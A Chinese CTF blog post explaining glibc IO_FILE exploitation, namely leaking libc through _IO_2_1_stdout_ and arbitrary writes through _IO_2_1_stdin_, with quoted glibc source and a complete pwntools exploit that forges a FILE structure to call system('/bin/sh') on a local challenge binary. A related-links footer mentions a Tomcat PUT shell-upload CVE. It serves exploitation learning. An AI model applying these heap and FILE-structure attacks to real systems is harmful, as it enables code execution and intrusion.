之前写过一篇 IO_FILE——leak 任意读,但是在学习的时候偷懒了,没有深入去看,这次碰到 winmt 师傅出的题,就傻眼了,故再写一篇博客来记录一下。

例题 ctfshow Incomplete Menu :

洞在 edit 里,可以超过 size 进行一个置零的操作。

这里还是考虑利用 _IO_2_1_stdout_ 来泄露 libc 基址。这里就出现了一个在我上篇文章中忽略的知识点。上一篇文章是通过改 flag 的一系列操作来进行,而 _IO_2_1_stdout_ 还有另一种修改方式可以泄露 libc。及使 _IO_read_end == _IO_write_base,忽略源码在下面:

_IO_size_t

new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)

{

  _IO_size_t count;

  if (fp->_flags & _IO_IS_APPENDING)

    /* On a system without a proper O_APPEND implementation,

       you would need to sys_seek(0, SEEK_END) here, but is

       not needed nor desirable for Unix- or Posix-like systems.

       Instead, just indicate that offset (before and after) is

       unpredictable. */

    fp->_offset = _IO_pos_BAD;

  else if (fp->_IO_read_end != fp->_IO_write_base)

    {

      _IO_off64_t new_pos

    = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);

      if (new_pos == _IO_pos_BAD)

    return 0;

      fp->_offset = new_pos;

    }

  count = _IO_SYSWRITE (fp, data, to_do);

  if (fp->_cur_column && count)

    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;

  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);

  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;

  fp->_IO_write_end = (fp->_mode <= 0

               && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))

               ? fp->_IO_buf_base : fp->_IO_buf_end);

  return count;

}

还有本题还有不会的地方就是利用 _IO_2_1_stdin_ 进行任意写,走 io 的函数在读取数据时,会先判断缓冲区是否有数据,如果有数据,无论是否满足需要的数量,那么就会走缓冲区直接先取出来用,再从用户处读进缓冲区。故我们不能让 _IO_read_end > _IO_read_ptr

_IO_size_t

_IO_file_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)

{

  _IO_size_t want, have;

  _IO_ssize_t count;

  char *s = data;

  want = n;

  if (fp->_IO_buf_base == NULL)

    {

      /* Maybe we already have a push back pointer.  */

      if (fp->_IO_save_base != NULL)

    {

      free (fp->_IO_save_base);

      fp->_flags &= ~_IO_IN_BACKUP;

    }

      _IO_doallocbuf (fp);

    }

  while (want > 0)

    {

      have = fp->_IO_read_end - fp->_IO_read_ptr;

      if (want <= have)

    {

      memcpy (s, fp->_IO_read_ptr, want);

      fp->_IO_read_ptr += want;

      want = 0;

    }

      else

    {

      if (have > 0)

        {

          s = __mempcpy (s, fp->_IO_read_ptr, have);

          want -= have;

          fp->_IO_read_ptr += have;

        }

      /* Check for backup and repeat */

      if (_IO_in_backup (fp))

        {

          _IO_switch_to_main_get_area (fp);

          continue;

        }

      /* If we now want less than a buffer, underflow and repeat

         the copy.  Otherwise, _IO_SYSREAD directly to

         the user buffer. */

      if (fp->_IO_buf_base

          && want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))

        {

          if (__underflow (fp) == EOF)

        break;

          continue;

        }

      /* These must be set before the sysread as we might longjmp out

         waiting for input. */

      _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);

      _IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);

      /* Try to maintain alignment: read a whole number of blocks.  */

      count = want;

      if (fp->_IO_buf_base)

        {

          _IO_size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;

          if (block_size >= 128)

        count -= want % block_size;

        }

      count = _IO_SYSREAD (fp, s, count);

      if (count <= 0)

        {

          if (count == 0)

        fp->_flags |= _IO_EOF_SEEN;

          else

        fp->_flags |= _IO_ERR_SEEN;

          break;

        }

      s += count;

      want -= count;

      if (fp->_offset != _IO_pos_BAD)

        _IO_pos_adjust (fp->_offset, count);

    }

    }

  return n - want;

}

需要注意的是本题是要控制 _IO_read_ptr - _IO_read_end < 16 ,至于为什么,emmm也不是很好说,建议各位自己调试看看。

winmt师傅的exp:

from pwn import *

context(arch='amd64', log_level='debug')

io = process("./pwn")

elf = ELF('./pwn')

libc = ELF("./libc-2.27.so")

def get_IO_str_jumps():

   IO_file_jumps_offset = libc.sym['_IO_file_jumps']

   IO_str_underflow_offset = libc.sym['_IO_str_underflow']

   for ref_offset in libc.search(p64(IO_str_underflow_offset)):

       possible_IO_str_jumps_offset = ref_offset - 0x20

       if possible_IO_str_jumps_offset > IO_file_jumps_offset:

          return possible_IO_str_jumps_offset

def new(size):

    io.sendlineafter(">> ", "1")

    io.sendlineafter(">> ", str(size))

def edit(index, length, content):

    io.sendlineafter(">> ", "2")

    io.sendlineafter(">> ", str(index))

    io.sendlineafter(">> ", str(length))

    io.sendafter(">> ", content)

def new_x(size):

    io.sendline("1")

    sleep(0.1)

    io.sendline(str(size))

def edit_x(index, length, content):

    io.sendline("2")

    sleep(0.1)

    io.sendline(str(index))

    sleep(0.1)

    io.sendline(str(length))

    sleep(0.1)

    io.send(content)

new(0x200000);

edit(0, 0x201000 - 0x10 + libc.sym['_IO_2_1_stdout_'] + 0x10 + 1, '\n')

new_x(0x200000);

edit_x(1, 0x201000 * 2 - 0x10 + libc.sym['_IO_2_1_stdout_'] + 0x20 + 1, '\n')

libc_base = u64(io.recvline()[8:16]) - 0x3ed8b0

success("libc_base:\t" + hex(libc_base))

payload = p64(0)*5 + p64(1) + p64(0) + p64(libc_base + next(libc.search(b'/bin/sh')))

payload = payload.ljust(0xd8, b'\x00') + p64(libc_base + get_IO_str_jumps() - 8)

payload += p64(0) + p64(libc_base + libc.sym['system'])

new(0x200000);

edit(2, 0x201000 * 3 - 0x10 + libc.sym['_IO_2_1_stdin_'] + 0x38 + 1, payload)

payload = p64(0xfbad208b)

payload += p64(libc_base + libc.sym['_IO_list_all'] + 132)

payload += p64(libc_base + libc.sym['_IO_list_all']) * 6

payload += p64(libc_base + libc.sym['_IO_list_all'] + 0x10)

payload = payload.ljust(132, b'\x00') + p64(libc_base - (0x201000 * 3 - 0x10))

io.sendlineafter(">> ", payload)

io.interactive()

此外还有一个通过 stdout 的任意写:

  else if (f->_IO_write_end > f->_IO_write_ptr)

    count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */

  /* Then fill the buffer. */

  if (count > 0)

    {

      if (count > to_do)

    count = to_do;

      f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);

      s += count;

      to_do -= count;

    }

只需把 _IO_write_ptr 改为想要写入的首地址, _IO_write_end 指向写入地址的结尾(或者大一些)即可。

_IO_2_1_stdin_ 任意写及对 _IO_2_1_stdout_ 任意读的补充的更多相关文章

  1. 用java写一个两个任意长度字符串数字和的算法

    package com.cn.test.string; public class StringTest { public static void main(String[] args) { Strin ...

  2. Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

    Apache Tomcat 7.0.0~7.0.79 直接发送以下数据包即可在Web根目录写入shell: PUT /1.jsp/ HTTP/1.1 Host: 192.168.49.2:8080 A ...

  3. js模拟栈---进制转化。十进制转任意进制进制,任意进制转十进制

    var Stack = (function(){ var items = new WeakMap(); //先入后出,后入先出 class Stack{ constructor(){ items.se ...

  4. python 用类方法和静态方法实现是追加写文件内容,和读指定行号的内容

    用类方法和静态方法实现:一个是追加写文件一行内容,一个是读指定行号的内容   #coding=utf-8   class handle_file(object):     def __init__(s ...

  5. 怎样写APP计划书-20150313早读课

    我们每天都会收到拥有APP创意的人们的电话和邮件,他们想知道把这样的APP做出来需要多少钱.在Calvium,我们尽可能帮助他们,但有时候 做这样的报价真的很难.询问一款APP的价值,就和询问一条绳子 ...

  6. FFMpeg笔记(一) 使用FFmpeg将任意格式图片转换成任意格式图片

    void SrcToDest(char* pSrc, char* pDest,unsigned int nSrcWidth, unsigned int nSrcHeight, AVPixelForma ...

  7. 对《分享一下自己用c++写的小地图》一文的补充

    在写完上一篇文章后,发现了一个问题: 那就是编写的插件无法实时预览. 在学习了Slate之后,我找到了方法: 重写SynchronizeProperties函数 头文件中添加: #if WITH_ED ...

  8. javascript常用的基础函数或方法——写给新手的我(持续补充)

    1常用基础函数 alert函数:显示一个警告对话框,包括一个OK按钮.这就是传说中的警告框,此框一弹,世界就清静了.举例:   alert("我一旦出现,之前出现的就算了,我屁股后面你们就歇 ...

  9. Linux多线程实践(6) --Posix读写锁解决读者写者问题

    Posix读写锁 int pthread_rwlock_init(pthread_rwlock_t *restrict rwlock, const pthread_rwlockattr_t *rest ...

随机推荐

  1. linux关闭透明大页

    echo never > /sys/kernel/mm/transparent_hugepage/enabled echo never > /sys/kernel/mm/transpare ...

  2. Vue3.2中的setup语法糖,保证你看的明明白白!

    vue3.2 到底更新了什么? 根据原文内容的更新的内容主要有以下 5 块: 1.SSR:服务端渲染优化.@vue/server-renderer包加了一个ES模块创建, 与Node.js解耦,使在非 ...

  3. List<Integer>里有可能存String类型元素吗?

    这其实是我遇到的一个线上bug,在这里分享给大家. 如果是用反射,那就很简单了,毕竟泛型只是在编译期进行约束,对运行期是无能为力的. 想想看,如果不使用反射,有没有办法做到呢? 问题起因 在我们公司的 ...

  4. Lesson1——Pandas是什么

    pandas目录 一.简介 Pandas 是一个开源的第三方 Python 库,从 Numpy 和 Matplotlib 的基础上构建而来,享有数据分析"三剑客之一"的盛名(Num ...

  5. 回顾 2021 中国 .NET 开发者峰会

    .NET Conf China 2021 是面向开发人员的社区峰会,基于 .NET Conf 2021,庆祝 .NET 6 的发布和回顾过去一年来 .NET 在中国的发展.峰会由来自北京.上海.苏州. ...

  6. 从我做起[AutoMapper实现模块化注册自定义扩展MapTo<>()].Net Core 之二

    AutoMapper实现模块化注册自定义扩展MapTo<>() 我们都知道AutoMapper是使用的最多的实体模型映射,如果没有AutoMapper做对象映射那么我们需要想一下是怎么写的 ...

  7. Ubuntu下Java JDK安装

    1.仓库安装 待更新 2.手动安装 1.下载linux平台sdk. 官网:https://www.oracle.com/technetwork/java/javase/downloads/index. ...

  8. finally块

    /* finally 块: finally块的 使用前提是必须要存在try块才能使用. finally块的代码在任何情况下都会执行的,除了jvm退出的情况. finally非常适合做资源释放的工作,这 ...

  9. 有手就行5——jenkins项目构建类型(pipeline流水线项目构建推荐)

    有手就行5--jenkins项目构建类型(pipeline流水线项目构建推荐) Pipeline简介 1) 概念 Pipeline,简单来说,就是一套运行在 Jenkins 上的工作流框架,将原来独立 ...

  10. desktopForWin安装

    window环境下搭建appium(win7和win10都试过,能行),这里只说了Android自动化环境.iOS自动化需要MacOS支持. 一.python环境搭建 下载Python 官网下载地址h ...